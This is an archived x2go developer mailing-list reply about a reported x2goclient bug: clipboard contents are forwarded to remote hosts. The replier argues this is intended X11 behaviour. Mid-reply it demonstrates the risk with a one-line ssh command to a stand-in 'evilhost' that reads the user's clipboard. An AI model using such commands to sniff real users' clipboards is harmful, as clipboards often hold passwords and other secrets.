[X2Go-Dev] Bug#258: Bug#258: SECURITY: x2goclient allows clipboard sniffing
Alexander Wuerstlein
snalwuer at cip.informatik.uni-erlangen.de
Mon Jul 1 13:43:56 CEST 2013
On 13-07-01 04:56, Christoph Anton Mitterer <calestyo at scientia.net> wrote:
> Package: x2goclient
> Severity: grave
> Tags: security
>
> Hi.
>
> From: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=714588
>
>
> It seems that per default (and I even found no way to disable it)
> x2goclient (and perhaps other related tools?) transmit the content of
> the clipboard to the remote host.
Yes, other related tools like X11. x2go is basically just a faster
version of the traditional xforwarding. In X11 every client can always
access the clipboard/selection/etc., so you will also have the same
security problems (by design). E.g. 'ssh -X user at evilhost "xclip -o"'
demonstrates this.
> As this may easily contain passwords or other sensitive information,
> this is a extremely critical hole.
I disagree, this is not a hole at all, it works as intended. Its just
that users are often not educated about the implications of passing
around passwords via the clipboard etc.
But I concur that the ability to switch off clipboard/selection/...
forwarding in the x2goagent/x2goclient would be nice to have. Patches
are of course always welcome.
Ciao,
Alexander Wuerstlein.
More information about the x2go-dev
mailing list